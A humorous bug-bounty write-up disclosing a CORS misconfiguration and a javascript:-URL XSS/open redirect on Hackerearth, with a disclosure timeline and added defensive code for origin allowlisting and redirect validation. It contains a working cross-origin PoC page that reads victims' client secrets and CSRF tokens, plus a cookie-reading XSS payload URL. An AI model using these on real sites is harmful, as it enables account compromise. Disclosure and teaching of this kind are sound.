./dr3dd

A Hilarious Journey into the Mischief of Hackerearth - Unveiling Secrets and XSS Shenanigans


Introduction:

Greetings, fellow adventurers of the digital realm! Today, we embark on a captivating journey through the whimsical domain of Hackerearth, where two mischievous bugs await our discovery. Join me as we unravel the secrets and witness the amusing dance of Cross-Origin Misconfiguration and XSS/Open Redirect vulnerabilities. Hold onto your hats and prepare for a wild ride!

Part 1: Cross-Origin Misconfiguration - The Quirky Dance of Origins

Our adventure begins with the enchanting Cross-Origin Misconfiguration dance at Hackerearth. By changing the Origin header in our request, we discovered a delightful misconfiguration: the server reflected our origin in its Access-Control-Allow-Origin response and let credentialed requests through. The backend's regex, designed to validate the origin, had a peculiar blind spot: it only checked that the origin started with https://www.hackerearth.com and never verified where the host name ended. Leveraging this, we summoned a subdomain, www.hackerearth.com.dr3dd.live, and unleashed our small JavaScript script, slyly reading the client secrets and CSRF tokens of any logged-in victim who visited our page. Oh, the allure of those secrets!

<!DOCTYPE html>
<html>
<body>

<div>
<h1>Getting hackerearth Client secrets for victim!!!</h1>
<button type="button" onclick="loadDoc()">Get secrets!!!</button>
  <div id="demo1"></div>
  <div id="demo2"></div>
  <div id="demo3"></div>
<button type="button" onclick="get_csrf_token()">You can get any csrf token and make changes in victim account like this is account deactivate csrf token!!!</button>
  <div id="demo4"></div>
</div>

<script>
// Both requests are sent cross-origin with the victim's cookies attached
// (withCredentials). They only succeed because the server echoed our
// origin in Access-Control-Allow-Origin together with
// Access-Control-Allow-Credentials: true.
function loadDoc() {
  var xhttp = new XMLHttpRequest();
  xhttp.onreadystatechange = function() {
    if (this.readyState == 4 && this.status == 200) {
      // Parse the returned profile page and pull the values out of the DOM.
      var parser = new DOMParser();
      var xmlDoc = parser.parseFromString(this.responseText, "text/html").documentElement;
      var clientId = xmlDoc.querySelector('#client-id');
      var clientSecret = xmlDoc.querySelector('#client-secret');
      var username = xmlDoc.querySelector('#change-username');
      document.getElementById("demo1").innerHTML = clientId.innerText;
      document.getElementById("demo2").innerHTML = clientSecret.innerText;
      document.getElementById("demo3").innerHTML = username.innerText.replace('Edit', '');
    }
  };
  xhttp.open("GET", "https://www.hackerearth.com/users/profile-settings/", true);
  xhttp.withCredentials = true;
  xhttp.send();
}

function get_csrf_token() {
  var xhttp = new XMLHttpRequest();
  xhttp.onreadystatechange = function() {
    if (this.readyState == 4 && this.status == 200) {
      var parser = new DOMParser();
      var xmlDoc = parser.parseFromString(this.responseText, "text/html").documentElement;
      var csrf = xmlDoc.querySelector('#deactivate-form')[0].value;
      document.getElementById("demo4").innerHTML = "csrf for deactivate account : " + csrf;
    }
  };
  // The username recovered by loadDoc() is reused to build the per-user URL.
  var username = document.getElementById("demo3").innerText;
  var url = "https://www.hackerearth.com/deactivate/" + username.replace("Username: ", "");
  xhttp.open("GET", url, true);
  xhttp.withCredentials = true;
  xhttp.send();
}
</script>

</body>
</html>
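To show what the server side got wrong, here is an added example (not code from the original post or from Hackerearth) contrasting a prefix-only origin regex with an exact-match allowlist; the regex, allowlist and the attacker.example host are assumptions for illustration.

```javascript
// Added example: loose prefix check vs strict allowlist for CORS origins.
// The regex and allowlist below are assumptions that model the bug class
// described in the write-up, not Hackerearth's real configuration.

// Vulnerable: only requires that the Origin *starts* with the trusted site,
// so "https://www.hackerearth.com.dr3dd.live" is accepted.
const LOOSE_ORIGIN_RE = /^https:\/\/www\.hackerearth\.com/;
function looseOriginAllowed(origin) {
  return LOOSE_ORIGIN_RE.test(origin);
}

// Fixed: parse the Origin header and compare the whole origin
// (scheme + host + port) against an exact allowlist.
const ALLOWED_ORIGINS = new Set(["https://www.hackerearth.com"]);
function strictOriginAllowed(origin) {
  if (typeof origin !== "string") return false;
  let url;
  try {
    url = new URL(origin);          // "null" and garbage throw here
  } catch (e) {
    return false;
  }
  // url.origin normalises case and drops userinfo, e.g.
  // "https://www.hackerearth.com@attacker.example" -> "https://attacker.example".
  return ALLOWED_ORIGINS.has(url.origin);
}

// Build the CORS response headers: reflect only an allowlisted origin,
// never "*" together with credentials, and add Vary: Origin for caches.
function corsHeaders(origin) {
  if (!strictOriginAllowed(origin)) return {};   // no CORS headers at all
  return {
    "Access-Control-Allow-Origin": new URL(origin).origin,
    "Access-Control-Allow-Credentials": "true",
    "Vary": "Origin",
  };
}
```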

Part 2: XSS/Open Redirect - The Dazzling Duo of Exploits

As we delve deeper into the realm of Hackerearth, we stumble upon the dynamic duo of XSS and Open Redirect vulnerabilities. The social-login completion page took a redirect parameter and sent the browser wherever it pointed, without restricting the destination to the site itself. That alone makes it an open redirect; in a delightful twist, the parameter also accepted a javascript: URL, so the "redirect" executed JavaScript in the page's own origin and handed us document.cookie. The power to extract secrets through a simple URL manipulation is both amusing and enlightening.

https://www.hackerearth.com/social-login-complete-page/?redirect=javascript:alert(document.cookie)
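As an added example (not code from the original post or from Hackerearth), this is how a redirect parameter can be validated so that both the javascript: payload above and off-site targets fall back to a safe default; the trusted origin and default path are assumptions.

```javascript
// Added example: resolve the redirect parameter against the trusted origin,
// then only accept same-origin https targets and return a path-only string.
// TRUSTED_ORIGIN and DEFAULT_TARGET are assumptions for illustration.
const TRUSTED_ORIGIN = "https://www.hackerearth.com";
const DEFAULT_TARGET = "/";

function safeRedirectTarget(redirectParam) {
  if (typeof redirectParam !== "string" || redirectParam.length === 0) {
    return DEFAULT_TARGET;
  }
  let url;
  try {
    // Relative paths resolve against the trusted origin; an absolute URL
    // such as "javascript:alert(document.cookie)" keeps its own scheme.
    url = new URL(redirectParam, TRUSTED_ORIGIN);
  } catch (e) {
    return DEFAULT_TARGET;
  }
  // Scheme allowlist: rejects javascript:, data:, vbscript:, http:, ...
  // (the URL parser lowercases the scheme and strips stray tabs/newlines,
  // so "JavaScript:" or "java\tscript:" are caught as well).
  if (url.protocol !== "https:") return DEFAULT_TARGET;
  // Host check: rejects "//attacker.example/..." style open redirects.
  if (url.origin !== TRUSTED_ORIGIN) return DEFAULT_TARGET;
  // Hand back only path + query + fragment so no scheme or host can be
  // smuggled into the Location header.
  return url.pathname + url.search + url.hash;
}
```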

Conclusion: A Dance of Fixes and Lessons

Our adventure through the amusing world of Hackerearth comes to a close, but the journey has left us with valuable insights. Although these vulnerabilities provided us with laughter and intrigue, it is crucial to remember the importance of fixing them. While the cross-origin misconfiguration has been rectified, the open redirect vulnerability still awaits a resolution.

Let us embark on our own quest to bolster cybersecurity defenses. May we embrace the whimsy of the digital world while diligently patching vulnerabilities, ensuring a safer online realm for all. And with that, dear adventurers, go forth and spread laughter, knowledge, and secure coding practices to all corners of the digital landscape!

[Note: The bugs mentioned in this blog have been reported to Hackerearth for appropriate action and resolution.]

[Disclaimer: The purpose of this blog is to entertain and educate about the importance of cybersecurity. Please refrain from attempting any malicious activities or exploiting vulnerabilities without proper authorization.]

Timeline

  1. March-16-2020: Submitted report to Hackerearth via mail.
  2. March-18-2020: Submitted detailed POC for both bugs.
  3. March-27-2020: 1st bug (CORS misconfiguration) is fixed.
  4. April-18-2020: Asked for an update; they said they were still working on a fix.
  5. Jan-02-2021: XSS is fixed.
  6. April-16-2021: Acknowledged and rewarded with swag.